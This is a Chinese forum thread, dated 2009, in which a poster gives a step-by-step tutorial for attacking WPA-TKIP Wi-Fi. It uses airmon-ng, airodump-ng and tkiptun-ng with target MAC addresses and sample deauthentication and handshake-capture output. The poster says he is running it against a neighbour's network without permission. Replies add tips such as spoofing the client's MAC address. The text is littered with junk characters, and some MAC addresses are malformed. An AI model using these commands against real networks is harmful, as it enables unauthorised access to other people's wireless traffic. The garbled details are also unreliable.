tkiptun-ng攻击方法（我已经更新了请看下面）

ji8635382

9 L9 `6 g; a3 C  T$ Y
ErikTews将在东京的PacSec大会上，演示他是如何在15分钟内破解WPA加密技术的。之前的无线加密技术WEP只需使用当今的笔记本即可在几分钟内破解。EricTews将演示他是如何破解WPA加密技术来读取从路由器传往笔记本的数据。为了读取正在传送的数据，Tews找到了无需用字典攻击法，来破解临时密钥完整性协议（TKIP）的方法。
下面就是进行破解的步骤 我参考国外的论坛写的！
首先要具备3点必备的攻击条件
4 z( u; w4 a; @4 U, Y4 Q1 客户端和接入点必须使用WPA TKIP 而且客户端必须连接
2 客户端和接入点必须使用的网络协议地址的IPv4
# B( z" s* k2 R; ]' Z3一个长期存在的时间延长键（重新输入间隔）必须设定的接入点。在大多数调制解调器/无线路由器使用TKIP ，这一时期是默认情况下设置为3600秒，从而使攻击
& W8 u. a3 k$ q8 R5 e以上3点基本上是没有问题了下面是就是攻击了
airmon-ng a 首先把网卡监视模式打开:输入airmon-ng start wlan0 注意我的网卡端口是wlan0不同的网卡端口都不一样可以用ifconfig -a 进行查看
输入后出现的内如如下
PID     Name
' C, Q7 I; L$ `/ X4 t  `! q$ b2954    dhcpcd
0 W( }+ c& e& r1 C- D

Interface       Chipset         Driver
( o2 L! f% A& q: M' O) Z5 Z
) |. \) g: K& r& p+ Owlan0           RTL8187         r8187 (monitor mode enabled)
不需要另外安装tkiptun-ng bt3正式版有自带的
+ _5 e2 v4 M9 u5 S$ M6 e2楼有最新的aircrack工具里面有带tkiptun-ng工具
介绍下tkiptun-ng工具

) y; S4 ^1 T2 [0 a% ~% m2 n: ]" `" @- SFilter options:过滤器的！
4 ^+ L, I6 @% `7 F
      -d dmac   : MAC address, Destination
      -s smac   : MAC address, Source
      -m len    : minimum packet length
% @; v$ D( @' g      -n len    : maximum packet length
      -t tods   : frame control, To      DS bit
# s- ~8 U/ C: w, d# h0 n      -f fromds : frame control, From    DS bit
      -D        : disable AP detection

& ?7 e4 s9 _* c( L  Replay options:攻击的！

7 r" `' T- k2 m4 Z! p' S      -x nbpps  : number of packets per second
      -a bssid  : set Access Point MAC address
. V: K1 w7 b/ T% O$ d      -c dmac   : set Destination  MAC address
      -h smac   : set Source       MAC address
4 n* B: Y$ j, B5 O" c      -F        : choose first matching packet
' y- i' v/ W0 I      -e essid  : set target AP SSID
+ W) `, D* O$ P: Z' U" _
8 O( T# M5 Q0 g' _/ F% F% G  i  Debug options:调试的！
      -K prga   : keystream for continuation
      -y file   : keystream-file for continuation
4 a2 s6 Q4 }- |4 C, Z9 n& ~/ W3 l      -j        : inject FromDS packets
      -P pmk    : pmk for verification/vuln testing
      -p psk    : psk to calculate pmk with essid
  y4 b  \  W- U& L
! g2 F% X& Q2 z- A! p7 n$ c& B% e  source options:  这个不太清楚 。：）呵呵

      -i iface  : capture packets from this interface
/ f$ m* E4 n% y' _/ Q      -r file   : extract packets from this pcap file

. ^* [' f' @0 S; }% ^( Y8 K      --help              : Displays this usage screen
/ v4 ]; X2 P7 I" g" f
这个使用 airodump-ng -w 1 wlan0 这个就不解释了

我看下图1有一个essid为linksys的ap底下也有正常的客服端 这个我在上面注意已经强调了必需要有。
然后我们在打开一个 shell 下面开始tkiptun-ng的命令
5 L7 c# A6 W) C' dtkiptun-ng wlan0 -a 00:0C:413:12:81 -h 00:12:F0:6F:ED:38 wlan0 是我的端口 -a 是我们要工具的ap mac地址 使用airodump-ng工具时可以看到 -h 是我们自己的 mac地址用 ifconfig -a 可以查到 记入监视模式要忽略掉后面的0 接着我们可以看到图2的内容我们可以看到图上写着 注入成功 等待信号 拿到握手包 等等的内容
" r( z0 z9 b+ O( M最后就等待ARP协议数据包的收集了
" I' ^! y$ I, @6 t+ {
以上就是攻击的方式了
& L6 d) ?  C4 s- K+ Z0 m. [& k
# A% o( o+ C& R3 L# w0 z
呵呵我也不知道出了问题还是我遗漏了什么或者可能是我的配置是问题，tkiptun-ng攻击一直在等待数据包气死我了 但是看老外也有成功注入的人希望你们也可以成功    tkiptun-ng还是测试版 我想正式版出来应该可以解决很多问题的！ 希望大家对tkiptun-ng能多点关注 wpa的破解是有明天的 哈哈哈哈哈哈哈！！！！！！！！
+ j& N* x/ [* A) o  [- K* [$ s7 ~) `
$ J% `& t6 K/ ^5 G

! F' Q) l# c5 ~  r7 C; [
% a( K1 s5 ?$ Q7 y2 W1 {

6 {5 r% R9 b2 w4 E" }( o5 N0 O



1 [% r$ \( M$ ?9 I0 T% `- N3 ]: t, y
: l$ l0 I* j5 v% Y, b: }" I
  c6 A+ N$ {+ y" i9 a4 W- Y* [7 U
" o. M+ n7 Y3 [! j- r) U4 b: h. T

/ B7 J  u0 u7 i8 ^5 H- _; a
* o# U* z, B, W, W1 k  q' G) [0 x' d
. @, m0 q7 [, N, j/ J8 s' r! j9 u


7 j3 D. J* k- O2 X
( s8 n# ]7 R+ M: r% U+ E& p! g+ Z :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory: :victory:
! ]5 S% b4 B8 T9 s$ Q) X. G
底下是新写的哦！ 本教程只作参考任何法律责任我一概不负责。

2楼有最新的aircrack工具里面有带tkiptun-ng工具
3 W% j. a  g8 q: b5 H4 }1 |& U+ m
- r' I/ a6 B) b8 H0 Q忙了一上午回家 还是习惯把bt3打开看看回顾上次做的东西 突然有想到了tkiptun-ng因为用airolib-ng做hash表实在耗时间还有就是我邻居他设的wpa2密码实在厉害我已经给他搞的心力交瘁了，可是我有不想放弃比较我在这密码上耗的时间太多了。好了进入正题
2 i6 e$ K% Y+ \
打开shell输入airodump-ng -w vicino ath1 这个不解释了看不懂我也没有办法。
8 _" o8 a7 W) ~5 D- n; @; }! C监视你要破解的wpa-TKIP密码类型的ap记住必需要有客服端的
关于底下那朋友说的需要更改mac 其实是不需要的 你输入底下的命令后软件自动更改mac
1 tkiptun-ng -h 00:12:F0:6F:ED:38 -a 00:0C:413:12:81-m 80 -n 100 ath1 我用atheros网卡了所以显示ath1监视端口和上面的不一样，因为这次不是用我的华硕本本 今天用hp的！呵呵！ -m 是最小数据包长度 -n 是最大数据包长度 我 80 和100比较稳定其他都效果不佳 这个是真对我ath网卡的其他的自己试试。 -h 写客服端的mac
0 c- ?5 _6 D6 v; g6 T- A6 k！输入命令后出后会出现下面结果 图我没有办法给你们看了因为那太电脑还在破解中我是用另外的电脑写的希望你们理解！
# Z6 j9 ^2 o- x& r2 a& mBlub 2:38 E6 38 1C 24 15 1C CF
Blub 1:17 DD 0D 69 1D C3 1F EE
Blub 3:29 31 79 E7 E6 CF 8D 5E    如果一直停留在 等待ARP协议数据包 就重新开始因为一直等就没有用的！
3 X% s& N  q- n& o14:48:00  Michael Test: Successful（这个意思是测试成功）   看清楚上面的 blub 1 2 3这个是固定的显示一定要和我写的一样才可以成功        这个工具的握手包没法靠攻击得到大家请慢慢的等 自己用aireplay工具的是无用的我已经式过了。
14:48:00  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 1
- g! S% c% {5 \7 l2 k. {14:48:00  Found specified AP
14:48:00  Sending 4 directed DeAuth. STMAC: [00:0F:B5:AB:CB:9D] [ 2| 4 ACKs]
14:48:02  WPA handshake: 00:0C:413:12:81 captured
+ `" E* R/ B8 D7 O- P! `14:48:02  Waiting for an ARP packet coming from the Client...
Saving chosen packet in replay_src-1109-144822.cap
14:48:22  Waiting for an ARP response packet coming from the AP...
) d" v4 X7 [+ R# SSaving chosen packet in replay_src-1109-144822.cap
4 L1 b! c4 J' s" F& A. @6 Y) _14:48:22  Got the answer!
14:48:22  Waiting 5 seconds to let encrypted EAPOL frames pass without interfering.
/ G1 s5 w* l/ s* r) m1 _- P) I, `( c' \
( m7 j0 W8 y8 ASent  80 packets, current guess: 37..  看到了吗？和上面的不一样哦！呵呵 现在开始猜密码了，你们有没有注意它写什么发包猜测 也就是说这软件是攻击ap在获取wpa的密码信息 这那我想到破解wep了！呵呵 现在猜了37次了 密码还没出现看来我邻居的密码真的很复杂啊！  
+ r& S$ w; J2 F# {' j% A
hirte成员还没有公布正式的方法这些都是乱搞的！在东京大会上是15钟破解而我现在都用了1个小时还没有密码 现在只能等待正式版  
) J; n3 C3 j2 n) L    我现在电脑已经猜了58次 还没有出现密码   大家保佑我，如果出现密码会和大家说的 还有一个要注意客服端必需一直在线不然就无法用它攻击了。哎！！~~~~

zwmfyy

http://www.aircrack-ng.orG,这个站被屏蔽了.要用代理才能上了.

ji8635382

我已经做成lzm文件了放进 bt3\modules里面就可以了



: d: m4 T& t) `" J; R( o; ~' f23楼的 要等待2个相同的握手包才可以！ 我弄了4个握手包才可以继续。 其实可以用别的电脑攻击对方客服端！我就是这样做的 一台电脑进行攻击，另一台电脑收集ARP数据包。 我的密码没有破解出来 软件猜测190后 回复无法发送数据表。哎~~~
还是等待正式版的吧！ 听说也快了。 具体时间无从得知。

galaxysky

期待中........

zhouwenliang

好啊！！！！！！！！

lxl2008

:)好啊！！！！！！！！

daibi

========================================================
General Requirements
. ]6 p7 c, U4 f4 M, G( d7 B  uBoth the AP and the client must support QoS or sometimes called Wi-Fi Multi-media (WMM) on some APs.
: S6 r. {! _5 a# {* n: z9 b
/ M- D' p, `8 P( [The AP must be configured for WPA plus TKIP.

  z, f* A  j' z. k0 Q, S2 wA fairly long rekeying time must be in use such as 3600 seconds. It should be at least 20 minutes.
8 R+ ]4 h* E$ ~' m( ?3 s& C
# E: _6 t) F( X% |, YSpecific Requirements
The network card MAC address that is used by tkiptun-ng needs to be set to the MAC address of the client you are attacking.
==================================================

以上是官方网站上的最新解释，楼主似乎没有将自己的网卡MAC Fake 成和合法客户的一样

yorkz

有点实际的了

piper

大家给个能上这个网站的代理吧，thanks

ji8635382

========================================================
General Requirements
4 j6 q- [$ g0 UBoth the AP and the client must support QoS or sometimes called Wi-Fi Multi-media (WMM) on some APs.
% P" v- M% f. c# l
& ~2 j2 Y' Z! O  @& gThe AP must be  ...
3 S5 o4 w2 {/ h( r: m; zdaibi 发表于 2009-2-27 13:19

( [3 L* i) X# s; `5 L$ jSpecific Requirements
) V& h4 o" F! U: J8 Z. t
% J9 ^% H. [; h9 f. Jnetwork card MAC address that is used by tkiptun-ng needs to be set to the MAC address of the client you are attacking
) m: \  \$ C6 _0 k关于这个特殊要求我还真的没有看到，因为官方保密了许多内容 如破解过程等等都保密了。 楼上的谢谢你了 我现在试试看！ 不要字典 不要字典~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~祈祷！！

chang139

这东西不顶对不住楼主,严重关注中

sbbi

快了，快了，快了